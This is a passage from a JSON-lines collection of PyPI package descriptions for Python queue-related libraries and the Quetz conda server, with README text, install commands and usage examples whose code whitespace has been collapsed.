add or modify the packages (POST/api/channels/{name}/files, for example). Mirror channels can be used to off load traffic from the primary server, or to create a channel clone on the company Intranet.Creating a mirror channel is similar to creating proxy channels except that you need to change the value ofmirror_modeattribute fromproxytomirror(and choose a more suitable channel name obviously):{\"name\":\"mirror-channel\",\"private\":false,\"mirror_channel_url\":\"https://conda.anaconda.org/btel\",\"mirror_mode\":\"mirror\"}or with cURL:exportQUETZ_API_KEY=...\ncurl-XPOST\"http://localhost:8000/api/channels\"\\-H\"accept: application/json\"\\-H\"Content-Type: application/json\"\\-H\"X-API-Key:${QUETZ_API_KEY}\"\\-d'{\"name\":\"mirror-channel\",\"private\":false,\"mirror_channel_url\":\"https://conda.anaconda.org/btel\",\"mirror_mode\":\"mirror\"}'Mirror channels are read only (you can not add or change packages in these channels), but otherwise they are fully functional Quetz channels and support all standard read (GET) operations. For example, you may list all packages using GET/api/channels/{channel_name}/packagesendpoint:curlhttp://localhost:8000/api/channels/mirror-channel/packagesIf packages are added or modified on the primary server from which they were pulled initially, they won't be updated automatically in the mirror channel. However, you can trigger such synchronisation manually using the PUT/api/channels/{channel_name}/actionsendpoint:curl-XPUTlocalhost:8000/api/channels/mirror-channel/actions\\-H\"X-API-Key:${QUETZ_API_KEY}\"\\-d'{\"action\": \"synchronize\"}'Only channel owners or maintainers are allowed to trigger synchronisation, therefore you have to provide a valid API key of a privileged user.PluginsQuetz offers plugins in the plugins folder of this repo as well as via standalone installs. The following plugins are currently available:PluginDescriptionquetz_conda_suggestGenerate.mapfiles forconda-suggestquetz_content_trustGenerate signed repodata filesquetz_current_repodataTrim the repodata to only include latest package versionsquetz_dictauthenticatorDemo for creating new authenticatorsquetz_harvesterExtract additional metadata from packages using thelibcflibharvesterquetz_mamba_solveExport a specific set of package versions for reproducibilityquetz_repodata_patchingRepodata patchingquetz_repodata_zchunkServe repodata usingzchunkquetz_runexportsExtract and exposerun_exportsfrom package filesquetz_sql_authenticatorAn authenticator that stores credentials in the Quetz SQL database using passlib.quetz_tosEnforce signing the terms of service for Quetz usersquetz_transmutationConvert packages to .conda formatLicenseWe use a shared copyright model that enables all contributors to maintain the copyright on their contributions.This software is licensed under the BSD-3-Clause license. See theLICENSEfile for details."} +{"package": "quetz-sql-authenticator", "pacakge-description": "SQL AuthenticatorAn authenticator that stores credentials in the Quetz SQL database using passlib. It ships with REST routes for CRUD operations on the credentials table.InstallationLocally after cloning:pip install -e .Once uploaded to conda-forge:mamba install -c conda-forge quetz-sql-authenticatorUsageThe authenticator should be active now. You can login by navigating to/auth/sql/login.CRUD operationsThe authenticator provides REST routes to create, update, and delete credentials and to reset the entire table.GET /api/sqlauth/credentials/: List all users.GET /api/sqlauth/credentials/{username}: Verify that a user exists.POST /api/sqlauth/credentials/{username}?password={password}: Create a new user.PUT /api/sqlauth/credentials/{username}?password={password}: Update a user's password.DELETE /api/sqlauth/credentials/{username}: Delete a user."} +{"package": "quetz-theme", "pacakge-description": "quetz-themeA dark-yellow theme for Quetz.RequirementsJupyterLab >= 3.0Installpipinstallquetz-themeContributingDevelopment installNote: You will need NodeJS to build the extension package.Thejlpmcommand is JupyterLab's pinned version ofyarnthat is installed with JupyterLab. You may useyarnornpmin lieu ofjlpmbelow.# Clone the repo to your local environment# Change directory to the quetz-theme directory# Install package in development modepipinstall-e.# Link your development version of the extension with JupyterLabjupyterlabextensiondevelop.--overwrite# Rebuild extension Typescript source after making changesjlpmrunbuildYou can watch the source directory and run JupyterLab at the same time in different terminals to watch for changes in the extension's source and automatically rebuild the extension.# Watch the source directory in one terminal, automatically rebuilding when neededjlpmrunwatch# Run JupyterLab in another terminaljupyterlabWith the watch command running, every saved change will immediately be built locally and available in your running JupyterLab. Refresh JupyterLab to load the change in your browser (you may need to wait several seconds for the extension to be rebuilt).By default, thejlpm run buildcommand generates the source maps for this extension to make it easier to debug using the browser dev tools. To also generate source maps for the JupyterLab core extensions, you can run the following command:jupyterlabbuild--minimize=FalseUninstallpipuninstallquetz-theme\njupyterlabextensionuninstallquetz-theme"} +{"package": "queue-automator", "pacakge-description": "QueueAutomatorA Python library that wraps the multiprocessing package. It provides a simple to use API to build queue-based multiprocessing pipelines.instalationRunpip install queue-automator(use python >=3.6 )SummaryQueueAutomator provides a clean decorator API to get started with multiprocessing and queues.This library offers an easy interface to parallelize consecutive tasks that take a long time to finish.As it is build on top of the native python-multiprocessing library, you can run compute intensive tasks without locking the main processAll the code that manages queues, spawning and joining processes is already implemented, so you can focus on the task at hand.How it works:ExampleUsing only 1 worker functionfromqueue_automatorimportQueueAutomatorfromtimeimportsleep# Create an instance of QueueAutomator()automator=QueueAutomator()# Register a worker function (if input_queue_name and output_queue_name are not provided# they will default to 'input' and 'output' respectively). 'input' and 'output'# are necessary to mark the start and ending of your pipeline@automator.register_as_worker_function(process_count=2)defdo_work(item:int)->int:sleep(2)result=item*2print(f'{item}times two{result}')returnresultif__name__=='__main__':input_data=range(30)# Always set your input data before calling .run()automator.set_input_data(input_data)results=automator.run()print(results)Using more than 1 worker functionfromqueue_automatorimportQueueAutomatorfromtimeimportsleepautomator=QueueAutomator()@automator.register_as_worker_function(output_queue_name='square_queue',process_count=2)defdo_work(item:int)->int:sleep(2)result=item*2print(f'{item}times two{result}')returnresult@automator.register_as_worker_function(input_queue_name='square_queue',output_queue_name='cube_queue',process_count=2)defdo_work_2(item:int)->int:sleep(2)result=item**2print(f'{item}squared{result}')returnresult@automator.register_as_worker_function(input_queue_name='cube_queue',process_count=2)defdo_work_3(item:int)->int:sleep(2)result=item**3print(f'{item}cubed{result}')returnresult# Note that the first and last functions in the pipeline do not need to# declare the input and output queue names respectively.if__name__=='__main__':input_data=range(30)# Always set your input data before calling .run()automator.set_input_data(input_data)results=automator.run()print(results)Using the MultiprocessingMaybe interfacefromqueue_automator.maybeimportMultiprocessMaybedefdo_work(item:int)->int:sleep(2)result=item*2print(f'{item}times two{result}')returnresultdefdo_work_2(item:int)->int:sleep(2)result=item**2print(f'{item}squared{result}')returnresultdefdo_work_3(item:int)->int:sleep(2)result=item**3print(f'{item}cubed{result}')returnresultif__name__=='__main__':result=MultiprocessMaybe()\\.insert(range(10))\\.then(do_work)\\.insert(range(10,20))\\.then(do_work_2)\\.insert(range(20,30))\\.maybe(do_work_3,default=0)print(result)CautionsAs with anything, this is not a silver bullet that gets rid of all problems using python multiprocessingThere are some caveats when using this library:Launching processes in python is an expensive operation, as it spawns a separate instance of the interpreter. The performance gains could be offset by the time it takes to spawn a processTry to keep the number of processes in line with your CPU cores, spawning a ton of them could result in slower performance overall.The input objects of every worker function need to be serializable or pickable. This is a limitation of python multiprocessing. If you are dealing with complex objects try to convert them to a suitable format before processing, or implement the__reduce__,__repr__or__dict__methods in your classes.It is important that you try to keep your worker functions pure, which means that they should not have side effects.The.run()method should be called from your main entry point or a function that is called at your main entry point, (this is another limitation of python's multiprocessing)Try to optimize the number of process depending of how long a task takes, prioritize longer running tasks."} +{"package": "queue_bqsr_status", "pacakge-description": "No description available on PyPI."} +{"package": "queue-broker-client", "pacakge-description": "No description available on PyPI."} +{"package": "queue-bytes-io", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "queue-client", "pacakge-description": "No description available on PyPI."} +{"package": "queue_coclean_status", "pacakge-description": "No description available on PyPI."} +{"package": "queueCrypt", "pacakge-description": "queueCrypt.\"queueCrypt\" is a library that is library that creates a queue and secures it better.\nBasically this library encrypts the data that is been added to the queue and saves the data\nsecurely and safely.Libraries Needed:pip install cryptographythis library is needed to encrypt the data. Without this\nlibrary the library won't work!How To Call The Library?fromqueueCryptimportQueueTo Call The Errors Exceptions Use:fromqueueCryptimportErrorQueueSizeNotValid,ErrorRequestedHigherThanExpected#----OR----#fromqueueCrypt.errorsimport*To Call The Encryption Handler Use:fromqueueCrypt.extimportEncryption#----OR----#fromqueueCrypt.extimport*First Thing That Needed Before Using...fromqueueCryptimport*q=Queue(5)#----OR----#q=Queue()Every time that you create the Queue function you can setQueue(number)or useQueue()which will leave the queue with no limit. By setting a number,\nyou set the queue length, that can be changed if you need by usingq.change_queue_length(number).Examples:Let's create a secret input from the user that takes passwords\nand encrypts them. The user will type the passwords until he will type\"quit\". After adding them\nto the queue, print the encrypted list, and the decrypted list.fromqueueCryptimport*q=Queue()whileTrue:user=input(\"Type passwords: \")ifuser==\"quit\":break# When putting the user data you need to convert it to bytes!q.put(bytes(user,'utf8'))# returns in bytes form.print(q.get_queue_encrypted())print(q.get_queue_decrypted())Now let's say that you want to encrypt the data again\nbut after printing the inputted data, you return the encrypted data and delete it.fromqueueCryptimport*q=Queue()whileTrue:user=input(\"Type passwords: \")ifuser==\"quit\":break# When putting the user data you need to convert it to bytes!q.put(bytes(user,'utf8'))print(q.get_queue_encrypted()[0].decode())# destroys the first element in the queue list with timeout of 0.1.q.next_and_destroy(0.1)"} +{"package": "queued", "pacakge-description": "No description available on PyPI."} +{"package": "queued_search", "pacakge-description": "UNKNOWN"} +{"package": "queue_engine", "pacakge-description": "What is engine?engine is a collection of tools for processing a queue. It provides an API to\ndefer a callable and run it later. engine also provides process helpers to\nset up a safe environment for clearing different kind of queues.How to use engine?The basic usage of engine is to defer something to execute later. However, the\ninternals are written in such way to allow for planning. You can plan your\ncode to use a queue, but a queue doesn\u2019t even need to be present. Lets take a\nlook at an example:>>> import engine\n>>> def hello_world():\n... print \"hello world\"\n\n>>> engine.defer(hello_world)\nhello worldAs you can see above, the functionhello_worldwas executed immediately.\nThis is because, by default, engine will use theDummyQueuewhich will\nexecute the given callable when put on the queue.If you have a queue such as stompserver, ActiveMQ or any STOMP compliant\nqueue you can useStompQueue. Lets take a look at an example:>>> import engine\n>>> def hello_world():\n... print \"hello world\"\n\n>>> engine.defer(hello_world, queue=engine.StompQueue())The above code will now defer the call tohello_worldby sending it to the\nqueue.You can define the default queue used by engine. To do this you should useengine.configure. Here is an example changing the default queue fromDummyQueuetoStompQueue:>>> import engine\n>>> engine.configure(queue=engine.StompQueue())Now all calls toengine.deferwill use theStompQueueinstance."} +{"package": "queue-fetcher", "pacakge-description": "No description available on PyPI."} +{"package": "queue-front", "pacakge-description": "Queue FrontA lowest-common-denominator API for interacting with lightweight queues.\nA fork ofhttps://code.google.com/p/queues/. This main reason for this\nfork was to add python 3.0+ compatibility. Although you should be aware\nthat the backend libraries may not be python 3.0+ compatible.BackendsAmazon sqsboto, MITmemcached*pylibmc, 3-clause BSD\n(a python wrapper aroundTangentOrg\u2018slibmemcachedlibrary.)bmemcached,\nMIT (a pure python module)beanstalkdbeanstalkc,\nAPL-2.0redisredis-py, MIT*memcached backends must use a queueing server such as MemcacheQ.Example$ export QUEUE_BACKEND=redisd\n$ export QUEUE_REDIS_CONNECTION=localhost:6379\n$ python\n>>> from queue_front import queues\n>>> q = queues.Queue('myname')\n>>> q.write('test')\nTrue\n>>> len(q)\n1\n>>> q.read()\ntest\n>>> queues.get_list()\n['myname']AdvancedPackages SecurityThis module, when packaged, is signed with the following key:Mario Rosa\u2019s Key with id 0x8EBBFA6F (full fingerprint F261 96E4 8EF2\nED4A 26F8 58E9 04AA 48D1 8EBB FA6F) and his email ismario@dwaiter.comYou can find this key on servers likepgp.mit.edu."} +{"package": "queue-helpers", "pacakge-description": "queue_helpersThis package is a helper that is used to manage queues in RabbitMQ.Installingpipinstallqueue_helpersUsage>>>fromqueue_helpersimportRpcClient>>>defsend_rpc_message(queue_name,request,rabbit_username,rabbit_password,rabbitserver,vhost):...client=RpcClient(rabbit_server_host=rabbitserver,...virtual_host=vhost,...server_queue_name=queue_name,...username=rabbit_username,...password=rabbit_password)...resp=client.call(json.dumps(request))...response=json.loads(resp.decode(\"utf-8\"))...returnresponse"} +{"package": "queue_hlatype_status", "pacakge-description": "No description available on PyPI."} +{"package": "queueing_network_system_simpy", "pacakge-description": "UNKNOWN"} +{"package": "queueing-rnn", "pacakge-description": "Queueing Recurrent Neural Network (Q-RNN)Queueing Recurrent Neural Network (Q-RNN)is a new kind of Artificial Neural Network that has been designed to use in time-series forecasting applications. According to experiments that have been run, QRNN has a potential to outperform the LSTM, Simple RNN and GRU, in the cases where the dataset has highly non-linear characteristics.Table of contentsWhat is Q-RNN?ComparisonInstallationUsageLicenseWhat is Q-RNN? \ud83e\udd14(Look of a Random Neuron [4])It is a compose ofSimple RNNandRandom Neural Network. Queueing RNN uses the fundamental math of Queueing Theory and G-Queues while combining it with the powerful architecture of Recurrent Neural Networks. For more detailed explanation about the theoretical background of QRNN check themathematical-modelfolder and references section.Comparison \ud83d\udccaIn order to evaluate the performance of QRNN, it has been compared with LSTM, GRU and Simple RNN using Keras with TensorFlow backend. During the experiments, 4 different data sets (google stock price,bike sharing,pm2.5 concentration,traffic volume) and 10 different optimization algorithms have been used. The mean square error distribution on the test set is given in the image below. As it seems QRNN manages to reach 3 lowest rms error out of 4.Check thetest_resultsfolder to see detailed results \ud83d\udd0e.Installation \ud83d\udee0Installing viapippackage manager:pipinstallqueueing-rnnInstalling via GitHub:gitclonehttps://github.com/bilkosem/queueing-rnncdqueueing-rnn\npythonsetup.pyinstallUsage \ud83d\udc69\u200d\ud83d\udcbbfromqueueing_rnnimportQRNNdata=data.reshape((samples,timesteps,features))qrnn=QRNN([features,hiddenneurons,outputneurons])# Shape of the networkforsinrange(samples):qrnn.feedforward()# Calculate Lossqrnn.backpropagation()Check theexamplesfolder to see detailed use \ud83d\udd0e.References \ud83d\udcda[1]Gelenbe, Erol. (1989). Random Neural Networks with Negative and Positive Signals and Product Form Solution. Neural Computation - NECO. 1. 502-510. 10.1162/neco.1989.1.4.502.[2]Gelenbe, Erol. (1993). Learning in the Recurrent Random Neural Network. Neural Computation. 5. 154-164. 10.1162/neco.1993.5.1.154.[3]Basterrech, S., & Rubino, G. (2015). Random Neural Network Model for Supervised Learning Problems. Neural Network World, 25, 457-499.[4]Hossam Abdelbaki (2020). rnnsimv2.zip (https://www.mathworks.com/matlabcentral/fileexchange/91-rnnsimv2-zip), MATLAB Central File Exchange. Retrieved September 22, 2020.License"} +{"package": "queueing-systems", "pacakge-description": "queueing_systemsPython Package for Queueing System Parameter Estimation using Queueing TheoryThis Python package is designed to assist with estimating parameters in queueing systems using queueing theory. It provides a set of tools and algorithms to analyze and model queueing systems, allowing users to estimate various parameters such as arrival rates, service rates, queue lengths, and waiting times. With this package, users can leverage the power of queueing theory to optimize and improve the performance of their systems."} +{"package": "queueing-tool", "pacakge-description": "Queueing-tool is a package for simulating and analyzing networks. It is an\nevent based simulator that usesqueuesto simulate congestion\nand waiting on the network that includes tools for\nvisualizing network dynamics.DocumentationThe package documentation can be found athttp://queueing-tool.readthedocs.org/.FeaturesFast simulation. Queueing-tool is designed to run very quickly;\nthe core algorithms were written incython.Visualizations. There are several tools that allow you to easily\nview congestion and movement within your network. This includes ready\nmade functions for animating network dynamics while your simulations\ntake place.Full documentation. Every function and class is fully documented\nbothonlineand in the\ndocstrings.Fast setup. The network is represented as anetworkx graph.\nQueueing-tool networks allow for probabilistic routing, finite\ncapacity queues, and different blocking protocols for analyzingloss networks.InstallationPrerequisites:Queueing-tool runs on Python 2.7 and 3.4-3.10, but\nchanges going forward are only tested against Python 3.6-3.10. Queueing-tool\nrequiresnetworkxandnumpy, and depends onmatplotlibif you want to plot.Installation: To install fromPyPIuse:pipinstallqueueing-toolThe above will automatically install networkx and numpy. If you want to plot use:pipinstallqueueing-tool[plotting]Note thatqueueing-toolusesnetworkx\u2019s pagerank implementation. As of\nnetworkx 2.8.6, they have several versions of the pagerank algorithm andqueueing-tooldefaults to using the version that requiresscipy. Ifscipyis not installed then it trys thenumpybased implementation.After installation, import queueing-tool with something like:importqueueing_toolasqtBugs and issuesThe issue tracker is athttps://github.com/djordon/queueing-tool/issues. Please report any bugs or issue that you find there. Of course, pull requests are always welcome.Copyright and licenseCode and documentation Copyright 2014-2022 Daniel Jordon. Code released\nunder theMIT\nlicense."} +{"package": "queueio", "pacakge-description": "queueio======Project descriptionRequirements------------Python 3.Install-------Install latest version: **pip install queueio**.Usage-----About-----"} +{"package": "queueless", "pacakge-description": "No description available on PyPI."} +{"package": "queuelib", "pacakge-description": "Queuelib is a Python library that implements object collections which are stored\nin memory or persisted to disk, provide a simple API, and run fast.Queuelib provides collections forqueues(FIFO),stacks(LIFO), queues\nsorted by priority and queues that are emptied in around-robinfashion.NoteQueuelib collections are not thread-safe.Queuelib supports Python 3.5+ and has no dependencies.InstallationYou can install Queuelib either via the Python Package Index (PyPI) or from\nsource.To install using pip:$ pip install queuelibTo install using easy_install:$ easy_install queuelibIf you have downloaded a source tarball you can install it by running the\nfollowing (as root):# python setup.py installFIFO/LIFO disk queuesQueuelib provides FIFO and LIFO queue implementations.Here is an example usage of the FIFO queue:>>> from queuelib import FifoDiskQueue\n>>> q = FifoDiskQueue(\"queuefile\")\n>>> q.push(b'a')\n>>> q.push(b'b')\n>>> q.push(b'c')\n>>> q.pop()\nb'a'\n>>> q.close()\n>>> q = FifoDiskQueue(\"queuefile\")\n>>> q.pop()\nb'b'\n>>> q.pop()\nb'c'\n>>> q.pop()\n>>>The LIFO queue is identical (API-wise), but importingLifoDiskQueueinstead.PriorityQueueA discrete-priority queue implemented by combining multiple FIFO/LIFO queues\n(one per priority).First, select the type of queue to be used per priority (FIFO or LIFO):>>> from queuelib import FifoDiskQueue\n>>> qfactory = lambda priority: FifoDiskQueue('queue-dir-%s' % priority)Then instantiate the Priority Queue with it:>>> from queuelib import PriorityQueue\n>>> pq = PriorityQueue(qfactory)And use it:>>> pq.push(b'a', 3)\n>>> pq.push(b'b', 1)\n>>> pq.push(b'c', 2)\n>>> pq.push(b'd', 2)\n>>> pq.pop()\nb'b'\n>>> pq.pop()\nb'c'\n>>> pq.pop()\nb'd'\n>>> pq.pop()\nb'a'RoundRobinQueueHas nearly the same interface and implementation as a Priority Queue except\nthat each element must be pushed with a (mandatory) key. Popping from the\nqueue cycles through the keys \u201cround robin\u201d.Instantiate the Round Robin Queue similarly to the Priority Queue:>>> from queuelib import RoundRobinQueue\n>>> rr = RoundRobinQueue(qfactory)And use it:>>> rr.push(b'a', '1')\n>>> rr.push(b'b', '1')\n>>> rr.push(b'c', '2')\n>>> rr.push(b'd', '2')\n>>> rr.pop()\nb'a'\n>>> rr.pop()\nb'c'\n>>> rr.pop()\nb'b'\n>>> rr.pop()\nb'd'Mailing listUse thescrapy-usersmailing list for questions about Queuelib.Bug trackerIf you have any suggestions, bug reports or annoyances please report them to\nour issue tracker at:http://github.com/scrapy/queuelib/issues/ContributingDevelopment of Queuelib happens at GitHub:http://github.com/scrapy/queuelibYou are highly encouraged to participate in the development. If you don\u2019t like\nGitHub (for some reason) you\u2019re welcome to send regular patches.All changes require tests to be merged.TestsTests are located inqueuelib/testsdirectory. They can be run usingnosetestswith the following command:nosetestsThe output should be something like the following:$ nosetests\n.............................................................................\n----------------------------------------------------------------------\nRan 77 tests in 0.145s\n\nOKLicenseThis software is licensed under the BSD License. See the LICENSE file in the\ntop distribution directory for the full license text.VersioningThis software followsSemantic Versioning"} +{"package": "queuelink", "pacakge-description": "The QueueLink library simplifies several queue patterns including linking queues together with one-to-many or many-to-one relationships, and supports reading and writing to text-based files.Interaction PatternA QueueLink is a one-way process that connects queues together. When two or more queues are linked, a sub-process is started to read from the \u201csource\u201d queue and write into the \u201cdestination\u201d queue.Circular references are not allowed, making QueueLink a \u2018directed acyclic graph\u2019, or DAG.Users create each queue, which must be instances ofmultiprocessing.Manager.JoinableQueue. Those queues can then be added to a QueueLink instance as either the source or destination.from multiprocessing import Manager\nfrom queuelink import QueueLink\n\n# Create the multiprocessing.Manager\nmanager = Manager()\n\n# Source and destination queues\nsource_q = manager.JoinableQueue()\ndest_q = manager.JoinableQueue()\n\n# Create the QueueLink\nqueue_link = QueueLink(name=\"my link\")\n\n# Connect queues to the QueueLink\nsource_id = queue_link.register_queue(queue_proxy=source_q,\n direction=\"source\")\ndest_id = queue_link.register_queue(queue_proxy=dest_q,\n direction=\"destination\")\n\n# Text to send\ntext_in = \"a\ud83d\ude02\" * 10\n\n# Add text to the source queue\nsource_q.put(text_in)\n\n# Retrieve the text from the destination queue!\ntext_out = dest_q.get()\nprint(text_out)"} +{"package": "queue-local", "pacakge-description": "queue-local"} +{"package": "queue-logger", "pacakge-description": "Set following Environment variables:QUEUE_HOST=QUEUE_BROKER_HOSTQUEUE_PORT=QUEUE_BROKER_PORTQUEUE_USER=QUEUE_BROKER_USERQUEUE_PASS=QUEUE_BROKER_PASSimportloggingfromQLGRimportcreate_loggerlogger=create_logger(__name__,logging.NOTSET)logger.info('This is an informational message.')logger.error('This is an error message.')Check your message broker (rabbitmq in this case), there must be 2 messages onlogsqueue."} +{"package": "queueman", "pacakge-description": "Queue managerWIPpython3-mpipinstallqueueman"} +{"package": "queueManager", "pacakge-description": "How to use this package?\nsee the following example\nfrom queueManager import queueManager\nqm = queueManager()\nqm.connect() #if no server is open,it will fail in seconds\na = qm.read() #blocks, until something in the queue can be read.\nprint(a)\ndata = \u2018test data\u2019\nqm.write(data)#write some data to the queue, notice that, the write and read queue are two different queues;"} +{"package": "queue-manager-api", "pacakge-description": "No description available on PyPI."} +{"package": "queue-map-reduce-sebastian-achim-mueller", "pacakge-description": "Queues for batch-jobs distribute your compute-tasks over multiple machines in parallel. This pool maps your tasks onto a queue and reduces the results.importqueue_map_reduceasqmrpool=qmr.Pool()results=pool.map(sum,[[1,2],[2,3],[4,5],])A drop-in-replacement for builtins\u2019map(), andmultiprocessing.Pool()\u2019smap().RequirementsProgramsqsub,qstat, andqdelare required to submit, monitor, and delete queue-jobs.Yourfunc(task)must be part of an importable python module.Yourtasksand theirresultsmust be able to serialize using pickle.Both worker-nodes and process-node can read and write from and to a common path in the file-system.Queue flavorTested flavors are:Sun Grid Engine (SGE) 8.1.9FeaturesRespects fair-share, i.e. slots are only occupied when the compute is done.No spawning of additional threads. Neither on the process-node, nor on the worker-nodes.No need for databases or web-servers.Queue-jobs with error-state'E'can be deleted, and resubmitted until your predefined upper limit is reached.Can bundle tasks on worker-nodes to avoid start-up-overhead with many small tasks.AlternativesWhen you do not share resources with other users, and when you have some administrative power you might want to use one of these:Daskhas ajob_queuewhich also supports other flavors such as PBS, SLURM.pyABC.sgehas asge.map()very much like our one.ipyparallelInner workingsmap()makes awork_dirbecause the mapping and reducing takes place in the file-system. You can setwork_dirmanually to make sure both worker-nodes and process-node can reach it.map()serializes yourtasksusingpickleinto separate files inwork_dir/{ichunk:09d}.pkl.map()reads all environment-variables in its process.map()creates the worker-node-script inwork_dir/worker_node_script.py. It contains and exports the process\u2019 environment-variables into the batch-job\u2019s context. It reads the chunk of tasks inwork_dir/{ichunk:09d}.pkl, imports and runs yourfunc(task), and finally writes the result back towork_dir/{ichunk:09d}.pkl.out.map()submits queue-jobs. Thestdoutandstderrof the tasks are written towork_dir/{ichunk:09d}.pkl.oandwork_dir/{ichunk:09d}.pkl.erespectively. By default,shutil.which(\"python\")is used to process the worker-node-script.When all queue-jobs are submitted,map()monitors their progress. In case a queue-job runs into an error-state ('E'by default) the job wFill be deleted and resubmitted until a maximum number of resubmissions is reached.When no more queue-jobs are running or pending,map()will reduce the results fromwork_dir/{ichunk:09d}.pkl.out.In case of non zerostderrin any task, a missing result, or on the user\u2019s request, thework_dirwill be kept for inspection. Otherwise its removed.Wordingtaskis a valid input tofunc. Thetasksare the actual payload to be processed.iterableis an iterable (list) oftasks. It is the naming adopted frommultiprocessing.Pool.map.itaskis the index of ataskiniterable.chunkis a chunk oftaskswhich is processed on a worker-node in serial.ichunkis the index of a chunk. It is used to create the chunks\u2019s filenames such aswork_dir/{ichunk:09d}.pkl.queue-jobis what we submitt into the queue. Each queue-job processes the tasks in a single chunk in series.JB_job_numberis assigned to a queue-job by the queue-system for its own book-keeping.JB_nameis assigned to a queue-job by ourmap(). It is composed of ourmap()\u2019s session-id, andichunk. E.g.\"q\"%Y-%m-%dT%H:%M:%S\"#{ichunk:09d}\"Environment VariablesAll the user\u2019s environment-variables in the process wheremap()is called will be exported in the queue-job\u2019s context.The worker-node-script sets the environment-variables. We do not useqsub\u2019s argument-Vbecause on some clusters this will not set all variables. Apparently some administrators fear security issues when usingqsub-Vto setLD_LIBRARY_PATH.Testingpy.test-s.dummy queueTo test ourmap()we provide a dummyqsub,qstat, andqdel.\nThese are individualpython-scripts which all act on a common state-file intests/resources/dummy_queue_state.jsonin order to fake the sun-grid-engine\u2019s queue.dummy_qsub.pyonly appends queue-jobs to the list of pending jobs in the state-file.dummy_qdel.pyonly removes queue-jobs from the state-file.dummy_qstat.pydoes move the queue-jobs from the pending to the running list, and does trigger the actual processing of the jobs. Each timedummy_qstat.pyis called it performs a single action on the state-file. So it must be called multiple times to process all jobs. It can intentionally bring jobs into the error-state when this is set in the state-file.Before running the dummy-queue, its state-file must be initialized:fromqueue_map_reduceimportdummy_queuedummy_queue.init_queue_state(path=\"tests/resources/dummy_queue_state.json\")When testing ourmap()you set its argumentsqsub_path,qdel_path, andqstat_pathto point to the dummy-queue.Seetests/test_full_chain_with_dummy_qsub.py.Because of the global state-file, only one instance of dummy_queue must run at a time."} +{"package": "queue-messaging", "pacakge-description": "No description available on PyPI."} +{"package": "queue-metrics", "pacakge-description": "queue-model-approxA repository of metrics that may apply to approximate queue models"} +{"package": "queue_mfc_manager", "pacakge-description": "No description available on PyPI."} +{"package": "queuepipeio", "pacakge-description": "This Python package provides two classes,QueuePipeIOandLimitedQueuePipeIO, that represent queue-based I/O objects. These\nclasses are ideal for multi-threaded or asynchronous programming where\ndata is produced in one thread or coroutine and consumed in another.InstallationYou can install this package from PyPI:pip install queuepipeioUsageHere\u2019s a basic example of how to useQueuePipeIOandLimitedQueuePipeIO:fromqueuepipeioimportQueuePipeIO,LimitedQueuePipeIO# Define MB as a constantMB=1024*1024# Create a QueuePipeIO objectqpio=QueuePipeIO(chunk_size=8*MB)# Write data to the queueqpio.write(b'Hello, world!')# Close the writerqpio.close()# Read data from the queuedata=qpio.read()print(data)# Outputs: b'Hello, world!'# Create a LimitedQueuePipeIO object with a memory limitlqpio=LimitedQueuePipeIO(memory_limit=16*MB,chunk_size=8*MB)# Write data to the queuelqpio.write(b'Hello, again!')# Close the writerlqpio.close()# Read data from the queuedata=lqpio.read()print(data)# Outputs: b'Hello, again!'ContributingContributions are welcome! Please feel free to submit a Pull Request."} +{"package": "queueplus", "pacakge-description": "QueuePlus \u27951\ufe0f\u20e3 version: 0.7.0\u270d\ufe0f author: Mitchell LisleA Python library that adds functionality to asyncio queuesInstallpipinstallqueueplusUsageYou can use AioQueue with all the same functionality as a regularasyncio.Queue.fromqueueplusimportAioQueueq=AioQueue()awaitq.put(\"hello world\")message=awaitq.get()# hello worldWith a few extra capabilitiesIterate over a queue (can be async or not)fromqueueplusimportAioQueueq=AioQueue()[awaitq.put(i)foriinrange(10)]# in non-async mode you would call q.put_nowaitasyncforrowinq:print(row)Collect all values into a listfromqueueplusimportAioQueueq=AioQueue()[awaitq.put(i)foriinrange(10)]messages=q.collect()# [0, 1, 2, 3, 4 ,5 ,6 ,7, 8, 9]Create a callback everytime a message is addedfromqueueplusimportAioQueueinq=AioQueue()outq=AioQueue()asyncdefcopy_to_q(message:str):awaitoutq.put(message)inq.add_consumer(copy_to_q)inq.put(\"hello world\")awaitinq.wait_for_consumer()Enforce a type on a queue, error if violatedfromqueueplusimportTypedAioQueue,RaiseOnViolationq=TypedAioQueue(int,violations_strategy=RaiseOnViolation)[awaitq.put(i)foriinrange(10)]messages=q.collect()# [0, 1, 2, 3, 4 ,5 ,6 ,7, 8, 9]awaitq.put(\"hello\")# Raises a ViolationErrorEnforce a type on a queue, ignore if violatedfromqueueplusimportTypedAioQueue,DiscardOnViolationq=TypedAioQueue(int,violations_strategy=DiscardOnViolation)[awaitq.put(i)foriinrange(10)]awaitq.put(\"hello\")messages=q.collect()# [0, 1, 2, 3, 4 ,5 ,6 ,7, 8, 9]Full examplefromqueueplusimportAioQueueimportasyncioasyncdefmain():q=AioQueue()awaitq.put(\"hello\")awaitq.put(\"world\")asyncforiteminq:print(item)if__name__==\"__main__\":asyncio.run(main())"} +{"package": "queuepool", "pacakge-description": "The main problem with psycopg2.pool (https://github.com/psycopg/psycopg2/blob/master/lib/pool.py), for example, is that the pool raises an exception (instead of blocking) when there are no more connections in the pool, and you either have to match the number of connections to the number of workers, or implement retry logic. Also, it doesn\u2019t implement connection recycling (on timeout or usage count), and therefore, doesn\u2019t fully address issue with stale connections and suited less (scales worse) for large production installations.This implementation is based on synchronized queue (https://docs.python.org/3/library/queue.html), and thus multithred safe. This is a streamlined port from Java version that was implemented about ten years ago and that has since then been running in heavy production evironment of one of our financial clients.This implementation features:A pool of generic resources that can be extended for specific resources like psycopg2 connections. Psycopg2 connection pool implementation is provided.On-demand lazy resource opening.Idle and open timeout recycling. Requires user code to executepool.recycle()method periodically (or start recycler thread bypool.startRecycler()), for example, once a minute. If this method isn\u2019t executed periodically, then the recycling is performed only when the resource are either taken or returned back to the pool, and therefore, the pool can accumulate a number of idle connections that exceed the idle or open timeouts.Usage count recycling.Recycling on exception.Recycling on a resource status.Context manager allows to use the pool with \u201cwith\u201d context manager so that the resources could be returned safely to the pool.LIFO queue helps the pool keep number of open resources to the minimum.This pool can be utilized successfully in large production installations as it tries to keep the number of open resources to the minimum, yet providing sufficient number of \u201chot\u201d (open) resources to avoid open/close cost.LicenseOSI Approved 3 clause BSD LicensePrerequisitesPython 3.7+ (with queue)For psycopg2 connections: psycopg2 2.8.2+InstallationIf prerequisites are met, you can installqueuepoollike any other Python package, using pip to download it from PyPI:$ pip install queuepoolor usingsetup.pyif you have downloaded the source package locally:$ python setup.py build\n$ sudo python setup.py install"} +{"package": 